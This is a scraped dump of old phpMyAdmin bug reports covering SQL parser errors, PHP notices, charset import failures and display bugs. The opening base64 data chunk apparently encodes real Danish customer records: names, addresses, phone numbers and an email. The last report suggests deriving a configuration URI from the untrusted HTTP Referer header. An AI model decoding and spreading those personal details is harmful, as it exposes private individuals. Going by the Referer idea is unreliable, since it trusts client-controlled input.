ZXMgKCczMDk1NjI2MScsICdT2FJFTiBIT0xNIEpFTlNFTi csICdO2FJSRUFMTMkgMjcgMSBUSC4n LCAnJywgJycsICc4MDAwJywgJzAwOCcsICcnLCAnJyc nLCAnJywgJycsICcnLCAnJywgJ0tPTlRB TlQnLCAnJywgJzAnKTsNCmluc2VydCBpbnRvIGRlYml0 b3JfZGF0YSAoa29udG8sIG5hdm4sIGFk cmVzc2UxLCBhZHJlc3NlMiwgYWRyZXNzZTMsIHBvc3R uciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJv ZywgdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3d3LCBiZXR hbGluZywgY3ZyLCByYWJhdCkgdmFsdWVz ICgnMzA5NjQ5ODYnLCAnRlJBTksgRUtFTFVORCcsICc nLCAnJywgJycsICczMzkwJywgJzAwOCcs ICdMUiAxMTAnLCAnJycnLCAnJywgJycsICcnLCAnJywg J0tPTlRBTlQnLCAnJywgJzAnKTsNCmlu c2VydCBpbnRvIGRlYml0b3JfZGF0YSAoa29udG8sIG5hd m4sIGFkcmVzc2UxLCBhZHJlc3NlMiwg YWRyZXNzZTMsIHBvc3RuciwgbGFuZCwgYXR0ZW50a W9uLCBzcHJvZywgdGVsZWZvbiwgZmF4LCBl bWFpbCwgd3d3LCBiZXRhbGluZywgY3ZyLCByYWJhdC kgdmFsdWVzICgnMzEnLCAnS09TVEEgVE9E T1InLCAnJywgJycsICcnLCAnJywgJzAwOCcsICcnLCAnJ ycnLCAnNDkxMyA0OTA5JywgJycsICcn LCAnJywgJ0tPTlRBTlQnLCAnJywgJzAnKTsNCmluc2Vy dCBpbnRvIGRlYml0b3JfZGF0YSAoa29u dG8sIG5hdm4sIGFkcmVzc2UxLCBhZHJlc3NlMiwgYWR yZXNzZTMsIHBvc3RuciwgbGFuZCwgYXR0 ZW50aW9uLCBzcHJvZywgdGVsZWZvbiwgZmF4LCBlb WFpbCwgd3d3LCBiZXRhbGluZywgY3ZyLCBy YWJhdCkgdmFsdWVzICgnMzEwMjA3JywgJ8VTTVVOR CBKT0hBTk5FU0VOJywgJ1JDIEVGRkVSU9hT R0FERSAyNScsICcnLCAnJywgJ0ZSLTExMCcsICcwND EnLCAnJywgJycnJywgJycsICcnLCAnJywg JycsICdLT05UQU5UJywgJycsICcwJyk7DQppbnNlcnQga W50byBkZWJpdG9yX2RhdGEgKGtvbnRv LCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmV zc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVu dGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1haWws IHd3dywgYmV0YWxpbmcsIGN2ciwgcmFi YXQpIHZhbHVlcyAoJzMxMDQ4MScsICdQxUxMIMVSTk kgSk9FTlNFTicsICdHUthOTEFOU1ZFR1VS IDQ3JywgJ0bGUthFUk5FJywgJycsICdGUi0xMDAnLCAn MDA4JywgJycsICcnJycsICcyOTggMjE0 MzM1JywgJzI5ODMxMDQ4MScsICdwYUBwb3N0Lm9s aXZhbnQuZm8nLCAnJywgJ0tPTlRBTlQnLCAn JywgJzAnKTsNCmluc2VydCBpbnRvIGRlYml0b3JfZGF0 YSAoa29udG8sIG5hdm4sIGFkcmVzc2Ux LCBhZHJlc3NlMiwgYWRyZXNzZTMsIHBvc3RuciwgbGFu ZCwgYXR0ZW50aW9uLCBzcHJvZywgdGVs ZWZvbiwgZmF4LCBlbWFpbCwgd3d3LCBiZXRhbGluZyw gY3ZyLCByYWJhdCkgdmFsdWVzICgnMzEx MDEyMzMnLCAnV1YgT0cgQVVESScsICdGUkVERVJJ S1NCT1JHVkVKIDQ3LTUxJywgJycsICcnLCAn MjQwMCcsICcwMDgnLCAnJywgJycnJywgJycsICcnLCA nJywgJycsICdLT05UQU5UJywgJycsICcw Jyk7DQppbnNlcnQgaW50byBkZWJpdG9yX2RhdGEgKG tvbnRvLCBuYXZuLCBhZHJlc3NlMSwgYWRy ZXNzZTIsIGFkcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0 dGVudGlvbiwgc3Byb2csIHRlbGVmb24s IGZheCwgZW1haWwsIHd3dywgYmV0YWxpbmcsIGN2ci wgcmFiYXQpIHZhbHVlcyAoJzMxMTAxMzcz JywgJ1VEIFNJTU9OIENIUklTVEVOU0VOJywgJ0xBVVJ JVFogU9hSRU5TRU5TVkVKIDEwIDIgVFYu JywgJycsICcnLCAnMjAwMCcsICcwMDgnLCAnVm9sdm 8gc29tbWVyJywgJycnJywgJycsICcnLCAn JywgJycsICdLT05UQU5UJywgJycsICcxJyk7DQppbnNlc nQgaW50byBkZWJpdG9yX2RhdGEgKGtv bnRvLCBuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIsIGF kcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0 dGVudGlvbiwgc3Byb2csIHRlbGVmb24sIGZheCwgZW1h aWwsIHd3dywgYmV0YWxpbmcsIGN2ciwg cmFiYXQpIHZhbHVlcyAoJzMxMTAxNjExJywgJ01BWkR BIEZSRURFUklLU0JFUkcnLCAnTU9SVEVO IFNQSVJPIEJJTEVSJywgJ0JPUlVQUyBBTExFIDE1Mi0 xNTYnLCAnJywgJzIwMDAnLCAnMDA4Jywg JycsICcnJycsICcnLCAnMzg4ODE2MTAnLCAnJywgJycs ICdLT05UQU5UJywgJycsICcxJyk7DQpp bnNlcnQgaW50byBkZWJpdG9yX2RhdGEgKGtvbnRvLC BuYXZuLCBhZHJlc3NlMSwgYWRyZXNzZTIs IGFkcmVzc2UzLCBwb3N0bnIsIGxhbmQsIGF0dGVudGlv biwgc3Byb2csIHRlbGVmb24sIGZheCwg ZW1haWwsIHd3dywgYmV0YWxpbmcsIGN2ciwgcmFiY XQpIHZhbHVlcyAoJzMxMTAyMDg1JywgJ0pF TlMgQ0hSIEpFTlNFTicsICcnLCAnJywgJycsICcnLCAnM DA4JywgJycsICcnJycsICcnLCAnJywg JycsICcnLCAnS09OVEFOVCcsICcnLCAnMCcpOw0Ka W5zZXJ0IGludG8gZGViaXRvcl9kYXRhIChr b250bywgbmF2biwgYWRyZXNzZTEsIGFkcmVzc2UyLC BhZHJlc3NlMywgcG9zdG5yLCBsYW5kLCBh dHRlbnRpb24sIHNwcm9nLCB0ZWxlZm9uLCBmYXgsIG VtYWlsLCB3d3csIGJldGFsaW5nLCBjdnIs IHJhYmF0KSB2YWx1ZXMgKCczMTEwMjgyMCcsICdW T0dOTUFORCBQRURFUlNFTicsICdUSE9SQVNW RUogMTYnLCAnJywgJycsICcyNDAwJywgJzAwOCcsICc nLCAnJycnLCAnJywgJycsICcnLCAnJywg J0tPTlRBTlQnLCAnJywgJzEnKTsNCmluc2VydCBpbnRvI GRlYml0b3JfZGF0YSAoa29udG8sIG5h dm4sIGFkcmVzc2UxLCBhZHJlc3NlMiwgYWRyZXNzZT MsIHBvc3RuciwgbGFuZCwgYXR0ZW50aW9u LCBzcHJvZywgdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3 d3LCBiZXRhbGluZywgY3ZyLCByYWJhdCkg dmFsdWVzICgnMzExMDMzNTAnLCAnS0FMSyBPRyB N2FJURUxWxlJLRVJORScsICdDLkYuIFJJQ0hT IFZFSiAxMTEnLCAnJywgJycsICcyMDAwJywgJzAwOCc sICcnLCAnJycnLCAnTU9CIDMwMzIgNDEy NicsICcnLCAnJywgJycsICdLT05UQU5UJywgJycsICcwJy k7DQppbnNlcnQgaW50byBkZWJpdG9y X2RhdGEgKGtvbnRvLCBuYXZuLCBhZHJlc3NlMSwgYW RyZXNzZTIsIGFkcmVzc2UzLCBwb3N0bnIs IGxhbmQsIGF0dGVudGlvbiwgc3Byb2csIHRlbGVmb24sI GZheCwgZW1haWwsIHd3dywgYmV0YWxp bmcsIGN2ciwgcmFiYXQpIHZhbHVlcyAoJzMxMTAzMzY 2JywgJ0dMT0JFIEFVVE9NT0JJTEVSJywg J1RPTVNHxVJEU1ZFSiAyNicsICcnLCAnJywgJzI0MDAn LCAnMDA4JywgJycsICcnJycsICcnLCAn JywgJycsICcnLCAnS09OVEFOVCcsICcnLCAnMScpOw 0KaW5zZXJ0IGludG8gZGViaXRvcl9kYXRh IChrb250bywgbmF2biwgYWRyZXNzZTEsIGFkcmVzc2U yLCBhZHJlc3NlMywgcG9zdG5yLCBsYW5k LCBhdHRlbnRpb24sIHNwcm9nLCB0ZWxlZm9uLCBmYX gsIGVtYWlsLCB3d3csIGJldGFsaW5nLCBj dnIsIHJhYmF0KSB2YWx1ZXMgKCczMTEwNDU0MCcsI CdCUkRSLiBFTEtKxlInLCAnSEVKUkVWRUog MzMnLCAnJywgJycsICcyNDAwJywgJzAwOCcsICcnLC AnJycnLCAnJywgJycsICcnLCAnJywgJ0tP TlRBTlQnLCAnJywgJzAnKTsNCmluc2VydCBpbnRvIGRl Yml0b3JfZGF0YSAoa29udG8sIG5hdm4s IGFkcmVzc2UxLCBhZHJlc3NlMiwgYWRyZXNzZTMsIHB vc3RuciwgbGFuZCwgYXR0ZW50aW9uLCBz cHJvZywgdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3d3LC BiZXRhbGluZywgY3ZyLCByYWJhdCkgdmFs dWVzICgnMzExMDU5MTEnLCAnVkVERUwgUkVQUk9 EVUtUSU9OJywgJ0JFUk5IQVJEIEJBTkdTIEFM TEUgMzEnLCAnJywgJycsICcyMDAwJywgJzAwOCcsIC dBVFQ6IENIUklTVElBTiBIT0xURU4nLCAn JycnLCAnT1BTIDUwMTU3NDE2IEZBWCAzODM0Mzgw MCcsICcnLCAnJywgJycsICc4RCBORVRUTycs ICcnLCAnMCcpOw0KaW5zZXJ0IGludG8gZGViaXRvcl9k YXRhIChrb250bywgbmF2biwgYWRyZXNz ZTEsIGFkcmVzc2UyLCBhZHJlc3NlMywgcG9zdG5yLCB sYW5kLCBhdHRlbnRpb24sIHNwcm9nLCB0 ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3csIGJldGFsaW5 nLCBjdnIsIHJhYmF0KSB2YWx1ZXMgKCcz MTEwNzU2MicsICdCVUREWSBBVVRPU0VSVklDRSc sICdTT0xCSkVSR0hBVkUgMjAnLCAnJywgJycs ICcyMDAwJywgJzAwOCcsICcnLCAnJycnLCAnNDA1ND c1NjInLCAnJywgJycsICcnLCAnS09OVEFO VCcsICcnLCAnMScpOw0KaW5zZXJ0IGludG8gZGViaXR vcl9kYXRhIChrb250bywgbmF2biwgYWRy ZXNzZTEsIGFkcmVzc2UyLCBhZHJlc3NlMywgcG9zdG5 yLCBsYW5kLCBhdHRlbnRpb24sIHNwcm9n LCB0ZWxlZm9uLCBmYXgsIGVtYWlsLCB3d3csIGJldGF saW5nLCBjdnIsIHJhYmF0KSB2YWx1ZXMg KCczMTEwOTYxMicsICdVRCBI2EpURScsICcnLCAnJy wgJycsICcnLCAnMDA4JywgJ0ZlZHT4cmUg TXVnaOVyJywgJycnJywgJ0FSQjogNDIyNyA1ODIyIExP SyAyOTcgQUgnLCAnJywgJycsICcnLCAn TEIrMTBEJywgJycsICcxJyk7DQppbnNlcnQgaW50byBk ZWJpdG9yX2RhdGEgKGtvbnRvLCBuYXZu LCBhZHJlc3NlMSwgYWRyZXNzZTIsIGFkcmVzc2UzLCB wb3N0bnIsIGxhbmQsIGF0dGVudGlvbiwg c3Byb2csIHRlbGVmb24sIGZheCwgZW1haWwsIHd3dyw gYmV0YWxpbmcsIGN2ciwgcmFiYXQpIHZh bHVlcyAoJzMxMTA5OTg4JywgJ0NBUlNURU4gQ0FSJy wgJ1RIRUtMQVZFSiAzOCcsICcnLCAnJywg JzI0MDAnLCAnMDA4JywgJycsICcnJycsICcnLCAnJywg JycsICcnLCAnS09OVEFOVCcsICcnLCAn MScpOw0KaW5zZXJ0IGludG8gZGViaXRvcl9kYXRhIChrb 250bywgbmF2biwgYWRyZXNzZTEsIGFk cmVzc2UyLCBhZHJlc3NlMywgcG9zdG5yLCBsYW5kLC BhdHRlbnRpb24sIHNwcm9nLCB0ZWxlZm9u LCBmYXgsIGVtYWlsLCB3d3csIGJldGFsaW5nLCBjdnIsI HJhYmF0KSB2YWx1ZXMgKCczMTEyMzc1 MycsICdDQVJMIExBUlNFTlMgUEFQSVJIQU5ERUwnL CAnJywgJycsICcnLCAnJywgJzAwOCcsICcn LCAnJycnLCAnJywgJycsICcnLCAnJywgJ0tPTlRBTlQnL CAnJywgJzAnKTsNCmluc2VydCBpbnRv IGRlYml0b3JfZGF0YSAoa29udG8sIG5hdm4sIGFkcmVz c2UxLCBhZHJlc3NlMiwgYWRyZXNzZTMs IHBvc3RuciwgbGFuZCwgYXR0ZW50aW9uLCBzcHJvZyw gdGVsZWZvbiwgZmF4LCBlbWFpbCwgd3d3 LCBiZXRhbGluZywgY3ZyLCByYWJhdCkgdmFsdWVzIC gnMzExMzAyNTUnLCAnRlJBTkNLIE9HIFRP QklFU0VOJywgJ05PUkRFTiBUT0xEQk9EIDE4JywgJyc sICcnLCAnMTI1OScsICcwMDgnLCAnUE9M RU4gRsZSR0UgU1BFRElUSU9OJywgJycnJywgJycsICc nLCAnJywgJycsICdLT05UQU5UJywgJycs ICcwJyk7DQppbnNlcnQgaW50byBkZWJpdG9yX2RhdG EgKGtvbnRvLCBuYXZuLCBhZHJlc3NlMSwg YWRyZXNzZTIsIGFkcmVzc2UzLCBwb3N0bnIsIGxhbmQ sIGF0dGVudGlvbiwgc3Byb2csIHRlbGVm b24sIGZheCwgZW1haWwsIHd3dywgYmV0YWxpbmcsI GN2ciwgcmFiYXQpIHZhbHVlcyAoJzMxMTYw MDQzJywgJ0xVTkQnUyBBVVRPJywgJ0tM2FZFUkJMQ URTR0FERSAzNCcsICcnLCAnJywgJzI1MDAn LCAnMDA4JywgJycsICcnJycsICcnLCAnJywgJycsICcnL CAnS09OVEFOVCcsICcnLCAnMScp END CUT Original URL https sourceforge.net p phpmyadmin bugs 533 https sourceforge.net p phpmyadmin bugs 533 Original author thingmand Found in version 2.3.0 rc4","bug"
"24444","6903","2.3.0 rc5 dev) Importing an SQL dump fails when using UTF 8.
I m using phpMyAdmin 2.3.0 rc5 dev on Apache 2.0.39 with php 4.2.2 with iconv support and MySQL 4.0.2 nt on a Windows NT 5.1 machine.
I ve the phpMyAdmin laguage to german utf 8 with ISO 8859 1 as MySQL charset.
Some table records of my database contain German umlauts in TEXT or CHAR fields.
Exporting the database into an SQL dump works fine, I recieve a file that is encoded in ISO 8859 1.
If I try to import this file, it fails and MySQL sais amp;quot;Query was empty amp;quot; while in fact it isn t. Luckyly phpMyAdmin displays the one query that failed and I can see clearly that the umlaut was converted into a wired character...
If I switch phpMyAdmin s laguage setting to german iso 8859 1 the import works perfectly.
imho the problem is that phpMyAdmin expects the SQL file to be encoded in UTF 8 so it tries to convert it to ISO 8859 1... As a solution to this, the user should be able to specify the charset of his dump when uploading it.
Original URL https sourceforge.net p phpmyadmin bugs 534 https sourceforge.net p phpmyadmin bugs 534 Original author rabus Found in version 2.3.0 rc4","bug"
"24444","6904","2.3.0 rc4) Bug in Parser.
When trying to change a field from VAR to SET I received the following error.
Could it be because the table was not empty?
You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAw Mi8wNy8yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDY4 IDY5IDE0NzxiciAvPgpMZWZ0b3Zlcjog kTxiciAvPgpBOiA2OCA2OTxiciAvPgpTUUw6IEFMVEVS IFRBQkxFIGBPZmZpY2Vyc2AgQ0hBTkdF IGBQb3NpdGlvbmAgYFBvc2l0aW9uYCBTRVQoJ1dlYk1 hc3RlcicskVNlY3JldGFyeZIsIJFUcmVh c3VyZXKSLCCRVmljZSBQcmVzaWRlbnSSLCCRUHJlc 2lkZW50kiwgkVRyYWlsIEJvc3OSKSBOT1Qg TlVMTA== END CUT Original URL https sourceforge.net p phpmyadmin bugs 537 https sourceforge.net p phpmyadmin bugs 537 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6905","2.3.0 rc5 dev) Undefined variable when browsing a table.
If I try to browse a table, I get the following error Notice Undefined variable sub part in [PMA dir] tbl properties links.php3 on line 40 Original URL https sourceforge.net p phpmyadmin bugs 535 https sourceforge.net p phpmyadmin bugs 535 Original author rabus Found in version 2.3.0 rc4","bug"
"24444","6906","2.3.0 rc4) Illegal string index in sqlparser.
When I click on amp;quot;Optimize Table amp;quot;, I geht the message amp;quot;Warning Illegal string index in .
libraries sqlparser.lib.php3 on line 186 amp;quot;.
Nevertheless, optimization seems to work.
I think I ve seen this error in some other situations, but I don t know the exact circumstances...
Sorry.
Original URL https sourceforge.net p phpmyadmin bugs 536 https sourceforge.net p phpmyadmin bugs 536 Original author dralli Found in version 2.3.0 rc4","bug"
"24444","6907","2.3.0 rc4) SQL Parser Error.
Using 2.3.0 rc4 under Mac OS 10.1.5 with Apache 1.3.26 and MySQL 3.23.49 entropy.ch, and PHP 4.2.2 also provided by entropy.ch the following error occurs after Dumping a database to a file and then using the SQL sections file upload feature to repopulate the database.
It appears that it may be a problem with Mac line breaks as opening the file in BBEdit and changing line breaks to unix) \n from mac) \r took care of the problem.
BEGIN CUT eNqtkktLw0AQx3vyIPTofQ5CUihtEukr CCVHIrpw7YiPYVNM20W8nJ304c3 Qh Gz IFz36RUxr W9FWqODCLrMzvxlm 7PHDVcHfufHhHFkBZ86hdiL8xNQC2oJNEXRikqlqJVBreonil6qgY 9BDcxZ DMenDoPi eGtNweXujBFGKMADxlegAIqVLTqCrFwJKIJMh0OVh5DXyCrS aSiNjHNmuk nP5b4v zmdx9Jrut9QM6o3WT jx4eUpk7nsmkbfhL5Rt0wgfhKE1BbE8RHkLKwd6StpKGRVzUGr3 YfWjWUB SURk03DIMMBQ5FM4SZXcibo4IokvQFKkBTeijAs7JAHChLChR5 islUq7 CXuk7 QXDBEYRPXZcj5 XilDKuZ71iZivy7uabwXF3tR FVRLf eYxQsZOYgcCY20DKS6sO lVhnrompR4SdDot70fRzONo2 xBOHDxl1EDBMAlkamD0pL7Xa0jba6TaaRncAV YAQN58kVw2B 1Bxzxrzhs9o kBGTjoKQ== END CUT Original URL https sourceforge.net p phpmyadmin bugs 538 https sourceforge.net p phpmyadmin bugs 538 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6908","Case sensitive password field problem.
Hi ..
I have amp;quot;password amp;quot; in my user table but if I do SELECT COUNT password) FROM mysql.user or SELECT COUNT Password) FROM mysql.user It counts BOTH TIMES all the users in my table.
I use the BIN TARBALL of MySQL MAX 3.23.51 Linux) and MySQL 3.23 51 Win32).
Both show the same behaviour for all fields in all my tables and I wonder too, cause I thought it would be case sensitive... but this must have changed some time) OderWat Original URL https sourceforge.net p phpmyadmin bugs 539 https sourceforge.net p phpmyadmin bugs 539 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6909","2.3.0 rc4) Uninitialized string offset sqlparser).
When I try to browse a table the following message appears in the screen 2) Notice Uninitialized string offset 24 in f \apache\htdocs\phpmyadmin 2.3.0 rc4 \libraries\sqlparser.lib.php on line 186 Original URL https sourceforge.net p phpmyadmin bugs 540 https sourceforge.net p phpmyadmin bugs 540 Original author tonymarston Found in version 2.3.0 rc4","bug"
"24444","6910","Spelling error in English lang file.
String strSQPBugUnknownPunctation = Unknown Punctation String has a spelling error IMHO).
It probably should be amp;quot;Punctuation amp;quot; instead of amp;quot;Punctation amp;quot;.
Visa Original URL https sourceforge.net p phpmyadmin bugs 541 https sourceforge.net p phpmyadmin bugs 541 Original author visa","bug"
"24444","6911","2.3.0 rc4) dir= quot;ltr quot; for textarea tags.
Textarea tags should have the dir= amp;quot;ltr amp;quot; attribute.
Otherwise, when the language is right to left Hebrew for instance) it s impossible to edit SQL statements, etc.
Original URL https sourceforge.net p phpmyadmin bugs 542 https sourceforge.net p phpmyadmin bugs 542 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6912","2.3.0) strSQLParserUserError.
From the PMA translators mailing list There re more than 5 sentences in string strSQLParserUserError.
Also one sentence of it, is a duplicate of strSQLParserBugMessage.
i think we need some adjustment ) Original URL https sourceforge.net p phpmyadmin bugs 543 https sourceforge.net p phpmyadmin bugs 543 Original author robbat2 Found in version 2.3.0","bug"
"24444","6913","2.3.0 rc4) Claroline install generates bug report.
Database claroline running on localhost You seem to have found a bug in the SQL parser.
Please submit a bug report with the data chunk below BEGIN CUT eNpT8UyxUiguzClILCpOLdLLyUzSK8go0ClTMNQzNFUwMj Aw0jcw1zcyUzC0sDI2sDK1VMhJzbVU cK0oUFCxSSpS0LfjCs oVEjJTFEoT1VITy1RyEgtSrVXMDRWMDRRMDQzhCrySU0r yS9LLbJSYICK OFpBFEG5wYE VgrJOYlF TmZeal6QCcxUAXw7wKRO1ml94AwkJnr5OmHrqipUaaQgY GLyyXIP0DB xTHE0ckx2FXB003BNcIzOCQY4S4Af7w8TA== END CUT Tried to install Claroline.
Pointed to this file and it generated this error.
Just forwarding, as requested by phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 544 https sourceforge.net p phpmyadmin bugs 544 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","6914","2.3.0 rc4) Bug at creation of PHP code from SQL.
Bug at creation of PHP code from SQL is not present a backslash before quotes.
If in SQL code there are quotes that at creation of PHP code inside string there are no they amp;quot;slashing amp;quot;.
see picture.
Original URL https sourceforge.net p phpmyadmin bugs 545 https sourceforge.net p phpmyadmin bugs 545 Original author bigvax Found in version 2.3.0 rc4","bug"
"24444","6915","undefined variable amp; string offset.
On the cathegories Browse, SQL, Select, Insert i get the following Notice Notice Undefined variable sub part in .
tbl properties links.php on line 40 And in the cathegorie amp;quot;Browse amp;quot; i get the Notice Notice Uninitialized string offset 21 in .
libraries sqlparser.lib.php on line 186 but the tool is working fine.
using php v4.2.2) Original URL https sourceforge.net p phpmyadmin bugs 546 https sourceforge.net p phpmyadmin bugs 546 Original author daze2000 Found in version 2.3.0 rc4","bug"
"24444","6916","2.3.0 rc4) SQL parser bug.
Error when doing amp;quot;SELECT sum durxc3xa9e) FROM table; Presumably the error comes from the accent in durxc3xa9e .
Here s the data output by phpMyAdmin BEGIN CUT eNoti8EKgkAYBu89xXfoUBC6q1m5RBFhEBhRBl1N9jeFlbZdtXpk36IgjzPMDPdSwD6VvhlLxlFl 5uhCT1pwhwfwGPNcNne9GfhC EwEIRRVIaK3xnCZGbirwbX4QJYSL8KdahRkaA0 xe 3ed ElNeP loxA15uN Dc9JqdYIIniaHuBbaqRbExHY zOxwPSvFRkU3wBbCsxZQ== END CUT Original URL https sourceforge.net p phpmyadmin bugs 547 https sourceforge.net p phpmyadmin bugs 547 Original author thebubu Found in version 2.3.0 rc4","bug"
"24444","6917","Parser should use character sets.
Bug for fixing in 2.3.1.
See 593386 for reference information.
I have a workaround fix in the CVS tree for the moment, but long term, we need to know the characters in each character set that MySQL supports, so that we can use them for tokenizing identifers in the Parser system.
Original URL https sourceforge.net p phpmyadmin bugs 548 https sourceforge.net p phpmyadmin bugs 548 Original author robbat2 Found in version Latest Git","bug"
"24444","6918","2.3.0) common.lib.php3 js error waiting reply).
line 1085 should be if typeof document.getElementById) != undefined amp;amp; amp;amp; window.parent.frames[ nav ] amp;amp; amp;amp; window.parent.frames [ nav ].document.getElementById amp;lt;?php echo tbl .
md5 tbl; ?
amp;gt; ) amp;amp; amp;amp; typeof window.parent.frames [ nav ].document.getElementById amp;lt;?php echo tbl .
md5 tbl; ?
amp;gt; ).title) == string ) \{ window.parent.frames [ nav ].document.getElementById amp;lt;?php echo tbl .
md5 tbl; ?
amp;gt; ).title = amp;lt;?php echo PMA jsFormat tooltip, FALSE); ?
amp;gt; ; \} document.getElementById amp;quot;NX OBJ amp;quot;); will return null not typeof ) == undefined Original URL https sourceforge.net p phpmyadmin bugs 549 https sourceforge.net p phpmyadmin bugs 549 Original author anonymous","bug"
"24444","6919","2.2.7) sql.php display bug.
The insert new row link on a sql.php result page is not properly displayed SQL query SQL query [Edit] SELECT FROM `coach` LIMIT 0, 30 coachID image releasedate Edit Delete 2 Mangrove.gif 2002 08 12 amp;lt;a href= amp;quot;tbl change.php?
lang=en amp;amp;server=1 amp;amp;db=vvp amp;amp;table=coach amp;amp;pos=0 amp;amp;sessio n max rows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells =100 amp;amp;sql query=SELECT 2A FROM 60coach 60 amp;amp;goto=sql.php 3Flang 3Den 26amp 3Bserver 3D1 26amp 3Bdb 3Dvvp 26amp 3Btable 3Dcoach 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D30 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bsql query 3DSELECT 2B 252A 2BFROM 2B 2560coach 2560 amp;quot; amp;gt;Insert new row Original URL https sourceforge.net p phpmyadmin bugs 550 https sourceforge.net p phpmyadmin bugs 550 Original author anonymous Found in version 2.2.7","bug"
"24444","6920","2.2.7 Select HTML Code after result.
1) While making a select query in 2.2.7, I get HTML Code after the result list, somethig like amp;lt;a href= amp;quot;tbl change.php?
lang=en amp;amp;server=1 amp;amp;db=Tropentag amp;amp;table=rel abstract per sons amp;amp;pos=0 amp;amp;session max rows=30 amp;amp;disp direction=hor izontal amp;amp;repeat cells=100 amp;amp;sql query=SELECT 60abstractID 60 2C 60authorID 60 2C 60authornr 60 2C 60No Stars 60 2C 60TIMESTAMP 60 FROM 60rel abstract persons 60 WHERE 1 AND 60authorID 60 3D 127 amp;amp;goto=sql.php 3Flang 3Den 26amp 3Bserver 3D1 26amp 3Bdb 3DTropentag 26amp 3Btable 3Drel abstract persons 26amp 3Bpos 3D0 26amp 3Bsession max rows 3D30 26amp 3Bdisp direction 3Dhorizontal 26amp 3Brepeat cells 3D100 26amp 3Bsql query 3DSELECT 2B 2560abstractID 2560 252C 2560authorID 2560 252C 2560authornr 2560 252C 2560No Stars 2560 252C 2560TIMESTAMP 2560 2BFROM 2B 2560rel abstract persons 2560 2BWHERE 2B1 2BAND 2B 2560authorID 2560 2B 253D 2B127 amp;quot; amp;gt;Insert new row or even longer.
The problem exists both in IE 5.5 and Netscape 4.7 2) I try to edit one entry of the result list by selecting the edit link, nothing or bette a javascript error) happens in IE 5.5, it works fine in Netscape.
I can edit the entry by selecting amp;quot;open link in a new window amp;quot;, however this is somehow annoying, since it results in other error messages Thanks Andreas Original URL https sourceforge.net p phpmyadmin bugs 551 https sourceforge.net p phpmyadmin bugs 551 Original author anonymous","bug"
"24444","6921","2.3.0) Parse errors in translations.
Hi!
We ve found lots of annoying problems in the translations of the 2.3.0 release.
We re fixing them and maybe we will release a fixed revision very soon.
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 552 https sourceforge.net p phpmyadmin bugs 552 Original author loic1 Found in version 2.3.0","bug"
"24444","6922","2.3.0) Uninitialized string offset in sqlparser.lib.php3.
Hello Guys, I have found the following problem with using select function on tinyint fields.
Warning Uninitialized string offset 526 in var www html sites production main phpMyAdmin 2.3.0 libraries sqlparser.lib.php on line 401 Keep up the good work, Radek Original URL https sourceforge.net p phpmyadmin bugs 553 https sourceforge.net p phpmyadmin bugs 553 Original author anonymous Found in version 2.3.0","bug"
"24444","6923","2.3.0) Undefined variable in PMA mysql error ).
Hello fellows ; ) I like write something to you ...
Some minor changes libraries mysql wrappers.lib.php line 25 should be mysql error id) greeting Original URL https sourceforge.net p phpmyadmin bugs 554 https sourceforge.net p phpmyadmin bugs 554 Original author pauluz Found in version 2.3.0","bug"
"24444","6924","2.3.0) PHP Notice messages .... Hello!
I have error reporting set to E ALL in my php.ini file.
There are many places where we can see a Notice message 1) tbl relation.php line 323 Undefined index) when I ve entered some column comments and click amp;quot;Structure Relation view amp;quot; again 2) pdf pages.php line 260 Undefined variable do) after choose a Edit PDF Pages 3) libraries\sqlparser.lib.php line 401 Uninitialized string offset 69) when I change a checkbox checksum on Options screen 4) ....
I think may be more that messages ...
I saw some changes in tbl printview.php in lines 158, 193, 265 which disabled a Notice message ; )) 2.3.0 rc1 amp;gt; 2.3.0 rc3) I suggest use error reporting with NOTICE not notice) in config.inc.php And ones more I use a polish translation cfg[ DefaultLang ] = polish iso 8859 2 ; cfg[ DefaultCharset ] = windows 1250 ; other variables without changes) and Display PDF schema reports me this message Undefined font arial ce Maybe my configuration is wrong but I don t think.
It s strange.
Of course I ve ARIAL.TTF and all my polish fonts are display correctly in other applications.
Unfortunately when I use arial , fonts in PDF aren t good.
greetings Original URL https sourceforge.net p phpmyadmin bugs 555 https sourceforge.net p phpmyadmin bugs 555 Original author pauluz Found in version 2.3.0","bug"
"24444","6925","Better way to define cfgPmaAbsoluteUri?.
Your phpMyAdmin url Complete the variable below with the full url ie http www.your web.net path to your phpMyAdmin dir ectory It must contain characters that are valid for a URL, and the path is case sensitive on some Web servers, for example Unix based servers.
if isset HTTP REFERER)) \{ cgfRemoteDirTmp = HTTP REFERER; cgfRemoteDirTmp = strrev cgfRemoteDirTmp); pcgfRemoteDirTmp = strpos cgfRemoteDirTmp, amp;quot; amp;quot;); cgfRemoteDirTmp = substr cgfRemoteDirTmp, pcgfRemoteDirTmp, strlen cgfRemoteDirTmp)); cgfRemoteDirTmp = strrev cgfRemoteDirTmp); cfgPmaAbsoluteUri = amp;quot; cgfRemoteDirTmp amp;quot;; \} else cfgPmaAbsoluteUri = amp;quot;http amp;lt;phpMyAdmin Uri amp;gt; amp;quot;; ...
Better way to define it ?
When i am at home i usually use 10.0.0.2 phpMyAdmin , cause it s much quicker rather than going over the hole internet though my ip.
But this way i can use it at work and home home local ip ... Well just a though ...
